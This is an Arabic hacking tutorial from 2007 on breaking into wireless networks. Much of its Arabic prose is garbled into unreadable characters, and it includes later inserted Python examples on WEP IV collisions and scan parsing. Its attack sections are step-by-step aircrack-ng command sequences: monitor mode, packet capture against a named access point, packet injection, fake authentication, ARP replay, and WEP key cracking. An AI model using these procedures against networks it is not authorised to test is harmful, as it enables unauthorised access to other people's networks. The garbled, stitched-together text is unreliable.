ا رق ا و
http://www.t0010.com
א א א
א
BrokeN-ProXy
####################### Br0ken r0x ######################
# Lesson : Howto Hacking Wireless Networks step by step #
# Author: BrokeN-ProXy #
# Page: www.3asfh.net & www.sniper-sa.com #
# Contact Me 0nly email: [email protected] #
# Msn Messenger : [email protected] #
####################### r0x just do it ###############
#####
Hacking Wireless Networks
© Copyright #₪₩~ BrokeN-ProXy #₪₩~ 2007
W9:;<)א:+<=אא
%&*)('א
http://www.3asfh.net/vb/
+&א,%**)('א
http://www.sniper-sa.com/forums/
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
+=אא/8?א*@א
!"#$א א T0010.COM
##-א./א0*123(45## http://www.t0010.com/books/index.php
8!"#$א+א67 --------------------------------------------------------------
aLT3rEQ$Hacker ---------------------------------------------------------------
: ',-+ '()*+ قIـK 0ـ,K L+0ـMNار ا6FG اAdobe Reader /+0123 ام6789 ا:;<= >?@ ار6ـF إ2ـT] O;ـ,P8Nب و0ـ8SN اOTا63 دةIWI,N اX3وا2N ا:Y+ O,YZ [SN : [N08N اX3ا2N اa<= 'آ2dN اefI+ aN اذه> إ/+012^N ه_ا اL+ http://www.adobe.com/uk/products/acrobat/readstep2.html
W+ ('א ٥KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK WARNING(=A ٦KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKEF'אDא1) EWLANFEF'אD א J(-אK(& EFאN7$ @'אL!אM ١٣KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKEF'אDאOD Wired Equivalent PrivacyN5 Wi-Fi Protected AccessN5 ١٥KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKJ(אאא#Z[אV)Y*EX"א'אRS"אTUVWSא 6V\F ١٧KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK aircrack-ng]! 5 ١٨KKKKKKKKKKKKKKKKKKK_אOa5V*)!`E"_)אWwireless tools 5 ١٩KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKcX'אDא45d3e ٢٠KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK[ Monitor Mode]R-א9:'א4(A ٢٢KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKThe attack method 19"Sאij/(אk ٢٦KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKThe attack method 2!aאij/(אk ٣٢KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKlmא
WARNINGKKKKK(=A
KK0*1o*אאpS"א+<=אאi)אYE;אE אMX"n8Zא,6-א8!אZ: Dq0q6&()W("T)t"OY06&()W(()"uvFEHackingqאrMsp"MrM)(M" q (uSq /}אqqM$qq!MFFqq{qq (|=qqאN"SאLqq*אqqrqq!rMzqq*lM،(Zwqq xuSאq :" q&אDq![_q"'=אq)|אqA"q*Sא'אq~aאRq:"q6\!Sאqq(א/}<=אM!MKK,6-א EE,6-א+@, e&-"א W+<=אאr"0!&[(4_@)אr {אe)& +<=אאWZM)" KWirelessqאEF'אDאא#Z$_&WW_$"M
K8 אp"אS ,6V-'"אDא8E)אW_ !
EF'אD)אmTR"U-'א5D"א،!['אF+3%Mא6&W_a
K43*<)W($"Vא#Z
א6אV@rM '5Dqאq5rwא.5q/אq<JqM4~Dqאq6\!M[T)qWא-~א'אa"אK&! *א K*SאV6\!"V@K&p!KDV r*&('&-[*א zq*lMq5"qY-א4~Dqאq\!q "]אqאq 5 [O54e0.5/א17Z Vqq @"V&אqq qq (6Vqq !M(qq Tqq ~-אv""|)qq 3 א3qq (rM,6qq -א+qq @q q K &"אFEאN")א*"א [אj1 eR[6<-"א
EF'אDא1)
WEWLANFEF'אDא q6אFqq<"q&א5qS zq")((r|M[4*אdYDאr rwא
s%M
0qq (qq !#!$[אs7qq "א8qq !"#)אqq (אzqq ("M4qq E(rM qq (4qq א5|Mr")qq "Nqq 6א qq'אqq1'FqqאNFqqZ0qq!-אrאOqqk5qq@'אtqqkqqzqq1(eqq-אrqq sqq%M"qq5 K!#!$ N7FN6אi)אYEא8kSא WLAN \wireless local FqEFאq'אq qDqא8q<"T)()א*א4 =אq q<4q q5" radio Fq q(RאאTqq @:qq 1qq !#!$אDqq N7qq $ qq *=אqq <s6qq "Earea network KFESא1N7$א$) Efrequency/RF 8qEF*א אi)אYEאVedYD( אXא5Sא1T18Ve*Zא*אM ٢٠٠٥iqq1Nqqqq&;אqqM qq[`$w'אqq9:*Zqqאqq*אR)qq14q %")qq"Kqq!#!$ WN7F,t(7*1z1*Z)*א*א6&"
Ewireless computer cardsFEFא6 'אJ١ q =אq<|qA"0 ep r)"MZ.VW|M"MN6א.V TRWr)" K8WZ"M8ZאR8t<אz1
W8EF"'א5L!אM 01!6אTUVW8E$'5 PCMCIA
-אTUVW8E$'5
USB01!6"א-אTUVW8E$'5
.V)] א8E$'5V )W(*(#*EeN6אTUVWM8qeW\F
WEaccess pointFN% ! אJ٢ *ZqE!z1|AXא'אt * MK!#!$אD EF'אאDא47 Dq 07qq%Z1*q%q6 Tt אZ8t<א1N%! אD4e . 0pMNE 'א1
+<=אא8qeV( 5(kvD i!`E"
J(-אK(& rqqe،q /Dqq!$ אqqE"אqqאqq1R"،q Veאqq)qq5"א،qqEF' אqq*אKqqqqY W4a'En Institute of Electrical and Electronics Engineers (IEEE) Internet Engineering Task Force (IETF) Wireless Ethernet Compatibility Alliance (WECA) International Telecommunication Union (ITU) 4q!q5Kq(& IEEE 4q6&'אq16iqF _ a،J(- )אtRVWT)& #D Kq5"Eq SאqA;q"אMq((R'אqWi)אYqEא;אqE،،F _ aqFqZ9:.qVW q'&-א K'$7FNEאE"i)אYEאz" q *אq1"،q אTאRq qV IEEE 4a'Enre ،EF'אDאJ(( ;*M . EFאN7$'אDT)(exZM ("،rS"א،|RR#א
EFאN7$ @'אL!אM Xq'אeq-א9:_אR*qEאq¡Lאq!M6qpqEF' אDqאK*7q ،'אDא4a .EF'אDאL!אML!451 T=* *E"<1 '!אNE:E W (WWAN) *&אE"אEFאN7$@'אK١ "MT)q&אq&'אDq אq1qE$'$7qאJqEq,)Yq- אWWAN 'q*q¢l K%m'אDא qא-אi)אYEאNFZN")"אr)-א4a،&E"אe~אW {k*1'$7$<=אi)אYEא " KEF)אm|אe4Te-א1*7א6Sא6\!M "M'tא/אTR)& Global 8!qaא4qאq6\!M6qE2GF8!aא4א6\! אWWAN '*`&£ Cellular Digital Packet "،System for Mobile Communications (GSM) Code Division Multiple Access (CDMA). "،Data (CDPD) TR")qN¤qoq!:Vq& cq Xq"א،8!qaא4 אN7@'אN!FRVאe 9:ep _61_E EXא2aא4*'א9:،V& , {eאאi)19:ep . 2aא4j861}( D* ITU ¤jDK&אNN¤j!א: Oe
W Wireless metropolitan area networks ( WMAN ) K٢ q *6qpTR)q& qא,q qE$'$7qאJqEq,)Yq- אWMAN 'q*q¢l r")q E -א4ai1r["M8&Wi6p "M*&*()[¥rT)1, _FaF!) K mאOW"E3*'אF"אMt` אS'אF5)-&אא [cqu"،qאN7q$'אDq1)q54q6& rM WMAN 'Dqq ،cqu9:eqp K אN7$אDTWn- אmא4 &
zq1q אRאRUq("'q! א4q*;אq6אqA&@S"אM((RאאאS אWMAN '@i)Y K1'1 !#!:9:N%א,)Y6 eX(א* "א1EFאN7$@'א multichannel multipoint distribution service 4qa،q¡'q*i)אYqEאq 4q61q166، local multipoint distribution services (LMDS)"(MMDS) =q<(q )q'q%א-(אq [q *(אq18qEF אNq%אJ(q-IEEE 802.16 . '*א
W (WLAN)אEFאN7$@'אK٣ 4qEzq1Fqq * 6qpqE$'$7qאJqEq,)Yq- אWLAN 'q*ql KE 4ai1r["M،5@"Mz*6p،Na-א q5q5rq2qxqZM5qM["Mqn-אq- [אWLAN 'q@i)אYqE אq [4q6& אqr)Yq-א6q(zqTRqW LAN q@9:eqp "M،_ q!TOq5'F qא K¡'"M[";*א6p¡ א 4q6&'אq 47qqEES אWLAN 'q@[K,(q 4q6&rM WLAN 'Dqq 8qEFאNq%אq! qEqWZiRqTUqVWM"Mq((RאN7qאq@ ' TUVWMFEFא 9:Oq\!Lq!q WLAN 'q@[KDqEES"א*א46& 'א, j546&Xא KO\! r"R qqnN7qqאqq@אDqq(rM،'אlnqqqq14qqa،TR")qqqq *[,)YqqT)qq&qq .DאRא9:N%¥LאR*<(אu:،N%"!i)אYEא 'q!א4q!1qER)q§|="א،WLAN 'D٨٠٢{١١}z1 IEEE R%، 1997i1[ q(، q-) אq()}אq-א0q!5"")q(|=qא٨٠٢{١١b}q6_qe"Kq!a ~٢9: ١ KU<~W ٢{٤RR#אz1!a ~١١<)x71 '!א4! zq1q!a q q~ ٥٤<)qx7q1 '!א4!R)§|=א،٨٠٢{١١a<Z)()W} .U<~W٥RR#א
WWireless personal area networks ( WPAN ) K٤ ، PDA4qqaFTUqqVWqqe5qqE$'$7qqאJqqE qq,)Yqq- אWPAN 'qq*qql ;q( אPOS) 87qYDא46&;אe6pT)Wא-אE6א6 אTUVWM"M،(mאKא/א KM١٠ezi)Y- §|=<א; אPOS 8q< Bluetooth q*K;אq6אqA&@S "אBluetooth 8<EES אWPAN '* _ K_ )٣٠z'e9:'!א4*((RאאאS אi)Y4() * q Bluetooth q*(q q("qt"א+q"אr)אqאq1 Bluetooth 'q! 4! Xqא، Bluetooth Special Interest Group (SIG)z6qq*=אqV q6V q164q _)אW O~% !6pTUVWSא4%،4() 4D K١٩٩٩i1١{٠)א% אBluetooth '%' אD! . ;א6אA&@S 'k;אD!:,)Y6 ،E4M"M#١F iq
WPAN 'Dq٨٠٢{١٥4q6&אq16 IEEE qEM، WPAN'q*(q )q
1.0. )אq% אBluetooth 'q%א9:_אR*qEא، WPANJ(q(q =q<4q6&אq16 4~Dqqאqq!: ،qq אFVqqEאqq©،)qq&אqq©8qq<J(qq-=אqq/qqt)א`אqq
W)7-א W8אא אz1~p()אU6TeT_TaTW("R<+1 http://www.arabhardware.net/forum/showthread.php?t=27438&highlight=WLAN
qpMLqp- אqKqpM"3pא7 &אWRM"Lp-אz1)1 K0W`E|=אe
EF'אDאOqD WEP , WPA q6<"EF'אDאOD)Y-'א$5א,1!_()W( KK47 6V*1!`E"
WWired Equivalent PrivacyN5 J١ c=qq،qq*SאkqqY-אqqVW[אqqEF'אDqq@אDqq<IEEE)qqV&[raqqאRM q'אDqqe-א%7qmאqEא0q1qkMq( Nq5" 67 /<=א KWEP+$`1|="אEWired Equivalent PrivacyF {qq A"'qq &-אODqq RC4z1)qq ODqq qq .אZzqq 10qq * [WEPNqq 5" )qq 61א qq5.5Vqqqq TOqq ZTqq~0qqeKDqq5אzqqF(qqkNqq5"=אאqq<i)qq(،%7qqmא K (E4D T~aאv@`אE" bit ١٢٨"M 64 bit )Y-אODאT1\* ~א0( 8q<"RC4L!bit٢٤ODT<IVqאIV[Initialization Vector ][RWT~aא q(q&(IVqqe5q65 q6oqR=אא/"OR 128٦٤)YEא;אE K8r9:IVKM٥٠٠, qqE5qq<"$:{tqqR١٠=qqZ(q אqqאrMqqW)qq אqq ٢٤cqq!rM qq!cqqu)qq& rDqq1bit٦٤"bit١٢٨q qא0qq5vqq@`אqqEqq5M4Dqq T7qqאsqqrM4qqWMqq"
WWi-Fi Protected AccessN5 J٢ WEPq !58*אSאD-א4٢٠٠٣i1N5<=אאV "q(63,qE"q( =אq<1)q"Wi-Fi Protected Accessq 7qZא8q<WPA W 6< WPA with RADIUS *q"eOqEJ()q({אq(kq1,)Yq-{ <('א3[אR61$אr(( [<=א K4(kv@9:§0!Sm<=א א1sp"אvDאR)7 WPA with PSK [pre shared key] "M`q٦٣9:٨qqVeMR)q10q65|M`q&!rM !"$6&Eאa5Sא8<( "<=א K Hexadecimal٦٤ =qq <z6qq "qq Vא#Z&א7qq אqq sqq %M2qq _)אqq &qq a5M'qq .אZN6&qq E)אqq " 4Dq Xq"אTemporal Key Integrity Protocolqq7qZא8q<" TKIP q.אmא Ki)Yqq-א4qqqqRqqEאi)אYqqE אq E אi)Yqq4qqODqqאsqqOqq~qq(6qq K0( 54Vא8 "i)Y4 <"IV(k"WEP4a ARP 4q61 q*- qp"|=q"אMessage Integrity Code4qaxqZM'*qA9:ep =אq<"WEPNאi)YqqE$q@RqW"0q[0q rq 8q"אReplay Attack _ q(Mcq!M9:eqp LEM4D D (אc8 "IV 061L(ij/א R)qq& אqq6o)qqqq&(4~Dqq()qqMqqVeqqDqqאr:qq[iqqj/=אאq<i)YqqrM qq cqeא0qerq(i.$IV q6o)q(q*5אu:i.$0q!S4~Dq"Dqאcq"IV+ -א KEFאD*( J5S"א.Vא, 8D )1 V( 5r &!<+؟؟"אאV( 5r 4<,אWPAq W!V-א Dq (RqW-א47qq&(Deauthentication Attackz6q(iqj<i)אYqE אqE א qqEFאDqi)Yqq-אNqZRqq61q)qqrDq1qq!TqrDqq(Vq©"qEFא 5qq/)<אqq& qq*( Jqq5S"אi)Yq-א,qq ODqqאsqqNRqqqqVeqq(Xqאqq\3א8qq<" q6N"q§q&(brute force attack0q?אiqj<i)אYqE אqE אODqאcq(N"q§ q&()Yq-אRqEאTz1)6&(ij/<v®"DאOD)Y-אREא KVz1V(0!אO5N6!'אZ٨RE אu: 14
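Added here to illustrate the IV problem described in the WEP and TKIP sections above (my code, not the tutorial's or aircrack-ng's): the birthday bound applied to a 24-bit IV. Only the IV width enters the calculation, which is why a 64- or 128-bit WEP key changes nothing; the 48-bit width used for TKIP's sequence counter is an assumption stated for comparison, not a figure from the text.

```python
# Added example, not from the original tutorial or from aircrack-ng: the
# birthday bound applied to WEP's 24-bit IV. The key size (64 or 128 bit)
# never enters these formulas; only the IV width does, which is why a
# longer WEP key does not remove the keystream-reuse problem.
# TKIP_TSC_BITS (48) is an assumption used here for comparison only.
import math

WEP_IV_BITS = 24      # IV width given in the text
TKIP_TSC_BITS = 48    # TKIP per-packet sequence counter (assumed for comparison)


def collision_probability(n_frames: int, iv_bits: int) -> float:
    """Probability that at least two of n_frames share a randomly chosen
    IV out of 2**iv_bits values: 1 - exp(-n(n-1)/(2N)), the usual
    birthday approximation (tight when n is far below N)."""
    space = 2 ** iv_bits
    return 1.0 - math.exp(-n_frames * (n_frames - 1) / (2.0 * space))


def expected_reused_pairs(n_frames: int, iv_bits: int) -> float:
    """Expected number of frame pairs that share an IV, i.e. pairs encrypted
    with the identical RC4 keystream (key || IV is the same for both)."""
    return n_frames * (n_frames - 1) / (2.0 * 2 ** iv_bits)


def frames_for_probability(p: float, iv_bits: int) -> int:
    """Smallest n with collision_probability(n) >= p, solving
    n(n-1) = 2N * ln(1/(1-p)) for n."""
    target = 2.0 * 2 ** iv_bits * math.log(1.0 / (1.0 - p))
    return math.ceil((1.0 + math.sqrt(1.0 + 4.0 * target)) / 2.0)


def counter_iv_wrap(iv_bits: int) -> int:
    """Frames a counter-style IV can send before it must repeat a value,
    independent of how long the secret key is."""
    return 2 ** iv_bits


if __name__ == "__main__":
    n50 = frames_for_probability(0.5, WEP_IV_BITS)
    print(f"WEP: 50% chance of an IV collision after {n50} frames")
    print(f"WEP: ~{expected_reused_pairs(500_000, WEP_IV_BITS):.0f} reused "
          f"keystreams in a 500,000-frame capture")
    print(f"TKIP: 50% point at {frames_for_probability(0.5, TKIP_TSC_BITS):,} frames")
```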
J(אאא#Z[אV)Y!`EX"א'אRS"אTUVWSא KJ*i\!015N665.VW K١ Aircrack Tools {eא8E$'5 K٢ Aircrack-ng Tools K٣
aircrack-ng tools
{e א8E$'5 aircrack tools
5N6.VW J*i\!01 6V\F
ctאq@)q*1=qq5c=qAircrack ]q! zq146&qEJ('"א545Je0!א KJ*1)(cu9:ep:]!א1)(0!M;@א4)5rM"' '5Dqqאqq¯אK NETGEAR Or Linksys xqqE5DqאqqEאqqVq{qqeאq* 4qq<R)qqA`qqEXqqא8qq<rS_)אqqWqq6V§DqqאLqq!qq&![Chipset]§DqqאLqq!qq6
qqאLqq!46Dq("[]qq! אqqquZqN")qq]]אq! אqqqeא-"'אqqא,q(N")qqW=אq< KJ*aireplay _(M"J*".")*(airodump1R"chipset

Chipset             | Supported by airodump for Windows     | Supported by airodump for Linux                             | Supported by aireplay for Linux
--------------------|--------------------------------------|------------------------------------------------------------|-------------------------------------------------------------
Atheros             | CardBus: YES, PCI: NO (see CommView) | YES                                                        | YES (driver patching required)
Atmel               | UNTESTED                             | 802.11b YES, 802.11g UNTESTED                              | UNTESTED
Broadcom            | Old models only (BRCM driver)        | YES                                                        | IN PROGRESS (Forum thread)
Centrino b          | NO                                   | PARTIAL (ipw2100 driver doesn't discard corrupted packets) | NO
Centrino b/g        | NO                                   | YES                                                        | NO (firmware drops most packets); see ipw2200inject
Centrino a/b/g      | NO                                   | YES                                                        | NO (see this thread for alpha injection support)
Cisco Aironet       | YES?                                 | YES                                                        | NO (firmware issue)
Hermes I            | YES                                  | YES                                                        | NO (firmware corrupts the MAC header)
NdisWrapper         | N/A                                  | Never                                                      | Never
Prism2/3            | NO                                   | YES                                                        | YES (PCI and CardBus only, driver patching required)
PrismGT             | YES                                  | FullMAC: YES, SoftMAC: NOT YET                             | YES (driver patching recommended)
Ralink              | NO                                   | YES (rt2500 / rt2570 / rt61 / rt73 driver)                 | YES, see rt2500, rt2570, rt61 and rt73; also see the Ralink chipset comments later on this page for important concerns
RTL8180             | YES                                  | YES                                                        | UNSTABLE (driver patching required)
RTL8187L            | UNTESTED                             | YES (driver patching required to view power levels)        | YES (driver patching recommended for injection and required to view power levels)
TI (ACX100/ACX111)  | NO                                   | YES                                                        | YES (driver patching required)
ZyDAS 1201          | NO                                   | YES                                                        | Partially (see patch for details)
ZyDAS 1211[B]       | NO                                   | YES                                                        | YES
Others (Marvell...) | NO                                   | UNKNOWN                                                    | NO
Aircrack]! 5 La 'א kernel headers gcc 8q"אqV5(q 0&(. ±mאiU")(אV58(&א.אz1dY@45_ &k Debianzq1q*q&(.|M,5q W8אS"א"(אS אEs([Ubuntu , Xubuntu , Knoppix ]
sudo apt-get install build-essential

W8א אKK]!א5#8!rwא
wget http://download.aircrack-ng.org/aircrack-ng-0.9.1.tar.gz
tar -zxvf aircrack-ng-0.9.1.tar.gz
cd aircrack-ng-0.9.1
make
make install
)7-אa(אkKKJ*,)Y)*1e"&8<")_אWVE]!אa(k K_(J*] אe5 )Y"
_אOa5V*)!`E"_)אWwireless tools 5
wgetS Uא3!
wget http://pcmciacs.sourceforge.net/ftp/contrib/wireless_tools.28.tar.gz
tarS 0 ~pc!
tar xvfz wireless_tools.28.tar.gz
cd S )z14Z)!~אce)&
cd wireless_tools.28
makeS! {א
make
make install S ]!א7* i!
make install
q V*TOaqq5qq"אM{qq TאRS=אqq<qq1 qqcqq!M2qqJ(אqqאUqqqq5# qq*6=אqq<" KEV@R)7 *FOa"אiwlist "iwconfig
cX'אDא45d3e scan all networks around
4q4qvq@|=qאwireless tools qאq5rMqFiwlist qSאi)Yq!`qE ESאi)אYE א
bt ~ # iwlist ath0 scan
ath0      Scan completed :
          Cell 01 - Address: 00:14:7F:1F:27:6D
                    ESSID:"SpeedTouch433793"
                    Mode:Master
                    Frequency:2.462 GHz (Channel 11)
                    Quality=60/94  Signal level=-35 dBm  Noise level=-95 dBm
                    Encryption key:on
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
                              24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s
                              12 Mb/s; 48 Mb/s
                    Extra:bcn_int=100
                    Extra:wme_ie=dd180050f2020101880003a4000027a4000042435e0062322f00
          Cell 02 - Address: 00:18:39:24:5C:F8
                    ESSID:"linksys"
                    Mode:Master
                    Frequency:2.427 GHz (Channel 4)
                    Quality=50/94  Signal level=-45 dBm  Noise level=-95 dBm
                    Encryption key:off
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
                              48 Mb/s; 54 Mb/s
                    Extra:bcn_int=100
                    Extra:wme_ie=dd180050f2020101030003a4000027a4000042435e0062322f00
'R)"6O!a"א6T)"א,@23אj! kz1S[אsp<"א65 KrאS 6V-&'א-א
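Added example (not code from the tutorial): a parser for the `iwlist ... scan` format shown above that flags open and WEP-only access points, the check a site audit of one's own network would run over the same output. The sample scan is constructed; cells 01 and 02 mirror the two networks above, while cell 03 and its BSSID/ESSID are placeholders added to show how a WPA2 network announces itself.

```python
# Added example, not code from the original tutorial: a parser for the
# `iwlist <iface> scan` output above, one record per Cell, flagging access
# points that are open or WEP-only. SAMPLE_SCAN is constructed: cells 01 and
# 02 mirror the tutorial's scan; cell 03 (placeholder BSSID/ESSID) shows how
# a WPA2 network is announced through an "IE:" line.
import re
from dataclasses import dataclass, field

SAMPLE_SCAN = """\
ath0      Scan completed :
          Cell 01 - Address: 00:14:7F:1F:27:6D
                    ESSID:"SpeedTouch433793"
                    Frequency:2.462 GHz (Channel 11)
                    Encryption key:on
          Cell 02 - Address: 00:18:39:24:5C:F8
                    ESSID:"linksys"
                    Frequency:2.427 GHz (Channel 4)
                    Encryption key:off
          Cell 03 - Address: 02:00:00:00:00:03
                    ESSID:"example-wpa2"
                    Frequency:2.437 GHz (Channel 6)
                    Encryption key:on
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : CCMP
"""
@dataclass
class Cell:
    address: str
    essid: str = ""
    channel: int = 0
    encryption: bool = False
    ies: list = field(default_factory=list)
    @property
    def security(self) -> str:
        # key:on with no WPA/RSN information element leaves only WEP
        if not self.encryption:
            return "OPEN"
        return "WPA/WPA2" if any("WPA" in ie for ie in self.ies) else "WEP"
def parse_iwlist(text: str) -> list:
    cells = []
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"Cell \d+ - Address: ([0-9A-Fa-f:]{17})$", line)
        if m:
            cells.append(Cell(address=m.group(1).upper()))
        elif not cells:
            continue  # header text before the first Cell
        elif line.startswith("ESSID:"):
            cells[-1].essid = line[6:].strip('"')
        elif line.startswith("Frequency:"):
            ch = re.search(r"\(Channel (\d+)\)", line)
            cells[-1].channel = int(ch.group(1)) if ch else 0
        elif line.startswith("Encryption key:"):
            cells[-1].encryption = line.split(":", 1)[1].strip() == "on"
        elif line.startswith("IE:"):
            cells[-1].ies.append(line[3:].strip())
    return cells
def weak_aps(cells: list) -> list:
    """(ESSID, BSSID, security) for every AP a site audit should flag."""
    return [(c.essid, c.address, c.security)
            for c in cells if c.security in ("OPEN", "WEP")]
```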
[ Monitor Mode ]R-א9:'א4(A
N;`EMonitorR-א9:c54(Ac1AircrackUi)אYEא);[א4 K,5" (א؟u،Monitor mode zq1'qאrq(i.$ sniffing |q"'qj5אq)qrD1+"אא *( J5S N7$ ±ZR-<=אאManagedR-אz1r(vא.Vא'[אcDN"M WMonitor Modeq'54(3,(k)W( Kcommand line{(k1W9"Sא (א (א AircrackU 8airmon-ng z6U{(k1W!aא (א K_ E!5u4aManaged R-אz1r(vא'אcDN"M
bt ~ # iwconfig ath0
ath0      IEEE 802.11b  ESSID:""  Nickname:""
          Mode:Managed  Channel:0  Access Point: Not-Associated
          Bit Rate:0 kb/s   Tx-Power:31 dBm   Sensitivity=0/3
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=0/94  Signal level=-98 dBm  Noise level=-98 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0
Monitor Modeq'א4(3,( אvD iM`Erwא W9"Sא (א ،،،8& &אcommand line {(k1
bt ~ # ifconfig ath0 down
bt ~ # wlanconfig ath0 destroy
bt ~ # wlanconfig ath0 create wlandev wifi0 wlanmode monitor
ath0
bt ~ # ifconfig ath0 up
bt ~ # iwconfig ath0
ath0      IEEE 802.11b  ESSID:""  Nickname:""
          Mode:Monitor  Frequency:2.412 GHz  Access Point: 00:0F:B5:EA:2F:AF
          Bit Rate:0 kb/s   Tx-Power:31 dBm   Sensitivity=0/3
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=0/94  Signal level=-98 dBm  Noise level=-98 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

W!aא (א ،،8& &אAircrackU 8airmon-ng z6U{(k1
bt ~ # airmon-ng stop ath0

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
eth0            Centrino b/g    ipw2200
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

bt ~ # airmon-ng start wifi0

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
eth0            Centrino b/g    ipw2200
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

bt ~ # iwconfig ath0
ath0      IEEE 802.11g  ESSID:""  Nickname:""
          Mode:Monitor  Frequency:2.457 GHz  Access Point: Not-Associated
          Bit Rate:0 kb/s   Tx-Power:31 dBm   Sensitivity=0/3
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=0/94  Signal level=-94 dBm  Noise level=-94 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0
WWWWij/אk א5 z1M)*ErwאWWWW
The attack method 1
9"Sאij/(אk _(M"MonitorR-אz1'אr(rMij/(אk[M)rM4 KVא#Z()אXאJ(@אאR)rrM *( J5Sאz1c @*(F50er()*1ij/<=אאi)Y! Kinteractive ij/<=אאz6(" W8אu6*אNFZij/<=אא4@"Tesp 6
0qqe"qq*( Jqq5Sאzqq1c qq@+qq+$.qqVW)qqW(KKFqq1M83qqpא4Dqq*[אqq@qq4qqa arp 'qqk4qqE!vא،#qqY-א.qqVWqqZwא+qq F"א،4qq"MOaqq5xqqEqq*6V(qqqqcqqeא qq )qq qq 5M qq 6®"ivs)qq (U!rDqq 147qq -אqq *(F{אqq (kqq 1qq *( Jqq 5Sא9:request ٢٥٠{٠٠٠_q(qqAvא64 bitTqq ODqqאrqq qq& אqqODqqאcqq!)qq!rDqq1qq5א K05 ٥٠٠{٠٠٠_(A128 bitT OD"א،0q5
airodump-ng  - capture packets
aireplay-ng  - interactive attack mode (packet injection)
aircrack-ng  - crack WEP, WPA
(١) airodump-ng
K[V\"5`!אEU({<=|אk1
airodump-ng -c 11 --bssid 00:14:7F:1F:27:6D -w capture ath0

-c      : channel number
--bssid : MAC address of the access point
-w      : write the captured packets to a file
capture : prefix of the file the captured packets are saved to
ath0    : our interface name
(٢) aireplay-ng Interactive
interactivez6(ij<i)Y*E"'!אi!`EU({<=|אq q qk1
aireplay-ng --interactive -b 00:14:7F:1F:27:6D -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -p 0841 -h 00:13:CE:6D:61:59 ath0

--interactive : attack mode (interactive packet selection)
-b            : MAC address of the access point
-d            : destination MAC (broadcast)
-m 68         : minimum packet length
-n 68         : maximum packet length
-p 0841       : sets the frame control word
-h            : MAC address of the client
ath0          : our interface name
(3) increase the packets `qqEE٢FqqTq m{אqq )qq& "_)אqWqqqq!5q5אE١FqqTqq m<)![אq@qq4qa K6R(R.[א5<)אD
(4) aircrack-ng
OD אi!`EU({<=|אk1
aircrack-ng -b 00:14:7F:1F:27:6D capture.cap

-b          : MAC address of the access point
capture.cap : the capture file
The attack method 2
!aאij/(אk iqqj/=אאqq<z6qq("qq*( Jqq5Sאzqq1c qq@qq*(F5)qqW($)q*1iqqj/=אאqq<i)Yqq! Fake authentication
W8אu6*אNFZij/<=אא4@"Tesp 6
אu:i")q&q&(cqeא#"אq*( Jq5Sאz1c @*(F5|M)W($4D@*[א4a K*( J5Sאz1c @*(F50e qqEK(Uqq z6qq(Fc qq@qq*(F50qqeqq!Mqq*( Jqq5S<אqq!vאiqqj/=אאqq<i)Yqq!4qqא )<DqE"arp replay 4!86<א.Vא1*( J5Sא9:arp request 4E! K8Z4D R(R.[א5א
airmon-ng    - switch to monitor mode
airodump-ng  - capture packets
aireplay-ng  - attack mode: fake authentication
aireplay-ng  - attack mode: arpreplay
aircrack-ng  - crack WEP, WPA
(١) airodump-ng
K[V\"5!אvאU({<=|אk1
airodump-ng -c 6 --bssid 00:14:6C:1A:98:8C -w output ath0

-c      : channel number
--bssid : MAC address of the access point
-w      : write the captured packets to a file
output  : prefix of the file the captured packets are saved to
ath0    : our interface name
(٢) aireplay-ng fake authentication
K0FZ' א4E!"c @*(F50e!M06<!"*( J5Sא9:'k4E!
aireplay-ng --fakeauth 6000 -o 1 -q 10 -e DataCenter -a 00:14:6C:1A:98:8C -h 00-0F-B5-EA-2F-AF ath0

--fakeauth : attack mode (fake authentication)
-o 1       : send only one set of packets at a time
-q 10      : send keep-alive packets every 10 seconds
-e         : ESSID (name) of the access point
-a         : MAC address of the access point
-h         : MAC address of our card
ath0       : our interface name
(3) aireplay-ng arpreplay
K*( J5Sא9:* ±m}אRא-א,)Yarp request 4E!`E
aireplay-ng --arpreplay -b 00:14:6C:1A:98:8C -h 00-0F-B5-EA-2F-AF ath0

